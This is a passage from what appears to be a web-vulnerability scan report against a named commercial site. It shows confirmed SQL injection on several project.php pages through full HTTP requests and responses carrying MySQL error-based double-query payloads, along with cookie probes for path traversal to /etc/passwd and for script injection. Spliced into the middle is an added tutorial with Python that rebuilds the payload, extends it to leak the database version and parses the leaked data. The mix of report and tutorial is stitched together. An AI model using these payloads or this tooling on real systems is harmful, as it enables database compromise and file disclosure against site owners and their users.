cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=97ssd719pgv7qgc689p4am0r33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
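The echoed query above shows where the injection lands: the application splices the request path and query string into `prj.project_page_url = '...'`, which is why both `catId` and `iusrc` are injectable on every `project.php` in the report. The payload itself is the MySQL double-query trick: the subquery builds a GROUP BY key `<marker>:<0|1>` whose random bit is re-evaluated while MySQL fills its temporary table, so the same key can be inserted twice and the server aborts with `Duplicate entry '<key>' for key 1`, echoing the key into the page. The `CHAR()` chain is just the marker `_!@4dilemma` spelled without quotes, and the bit is random, which is why the responses above end in `:0` in one case and `:1` in another. The following Python is an added example, not code from the report or from Netsparker: it decodes the marker, rebuilds the exact payload seen in the `iusrc` parameter, shows the variant that splices a value such as `version()` into the key (an assumed follow-up, which is how a value like the report's `5.0.45` ends up inside the error), and parses the leaked value back out of constructed response tails modelled on the ones on this page.

```python
import re
from urllib.parse import quote_plus

# Marker expression exactly as it appears in the scanner's payload on this page.
MARKER_EXPR = ("CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),"
               "CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))")

# The iusrc / catId value from the report, verbatim; build_payload() must reproduce it.
PAGE_PAYLOAD = (
    "'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),"
    "CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),"
    "CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x "
    "limit 1))+'"
)

# Constructed response tails (not captured traffic): two confirmation errors as they
# appear on this page, one hypothetical follow-up with version() spliced in, one clean page.
SAMPLE_CONFIRM_0 = "... prj.project_page_url = 'x/'Duplicate entry '_!@4dilemma:0' for key 1"
SAMPLE_CONFIRM_1 = "... prj.project_page_url = 'x/'Duplicate entry '_!@4dilemma:1' for key 1"
SAMPLE_VERSION = "... prj.project_page_url = 'x/'Duplicate entry '_!@4dilemma5.0.45:1' for key 1"
SAMPLE_CLEAN = "<html><body>no database error on this page</body></html>"


def decode_char_concat(expr):
    """Turn CONCAT(CHAR(95),CHAR(33),...) into the string it spells ('_!@4dilemma')."""
    return "".join(chr(int(c)) for c in re.findall(r"CHAR\((\d+)\)", expr))


def build_payload(leak_expr=None):
    """Assemble the double-query payload.

    The GROUP BY key is <marker>[<leak_expr>]:<0|1>; the trailing bit comes from
    floor(rand()*2), which is re-evaluated while the temporary table is filled, so
    the same key can be inserted twice and MySQL fails with a Duplicate entry error
    that echoes the whole key.  With leak_expr=None this is the confirmation payload
    from the report; passing e.g. "version()" (assumed follow-up) leaks that value.
    The surrounding '+ ... +' closes the original string literal, adds the subquery
    result arithmetically and re-opens a literal to absorb the application's quote.
    """
    parts = [MARKER_EXPR]
    if leak_expr is not None:
        parts.append(leak_expr)
    parts += ["0x3a", "floor(rand()*2)"]
    return ("'+(select 1 and row(1,1)>(select count(*),concat(%s)x "
            "from (select 1 union select 2)a group by x limit 1))+'" % ",".join(parts))


def encode_for_query(payload):
    """URL-encode the payload for a GET parameter the way the report's request line does:
    spaces as '+', literal '+' as %2B, commas and '>' percent-encoded, quotes and
    parentheses left raw (the page uses lower-case hex digits; the meaning is the same)."""
    return quote_plus(payload, safe="'()*")


def extract_from_error(body, marker=None):
    """Return the value leaked between the marker and the ':<bit>' suffix, or None.
    For the confirmation payload the leaked value is the empty string."""
    marker = decode_char_concat(MARKER_EXPR) if marker is None else marker
    m = re.search(r"Duplicate entry '" + re.escape(marker) + r"(.*?):[01]' for key", body)
    return None if m is None else m.group(1)


def is_confirmed(body):
    """True when the marker-bearing duplicate-key error is present in the response."""
    return extract_from_error(body) is not None


if __name__ == "__main__":
    print("marker:", decode_char_concat(MARKER_EXPR))
    print("payload matches report:", build_payload() == PAGE_PAYLOAD)
    print("encoded:", encode_for_query(build_payload("version()")))
    for body in (SAMPLE_CONFIRM_0, SAMPLE_CONFIRM_1, SAMPLE_VERSION, SAMPLE_CLEAN):
        print(is_confirmed(body), repr(extract_from_error(body)))
```

A scanner needs the marker because the duplicate-key text also appears in ordinary application errors; matching on `_!@4dilemma` ties the error to this request. Because the colliding bit is random, a single request can come back without the error, so a confirmation step has to retry rather than treat one clean response as a negative.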

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
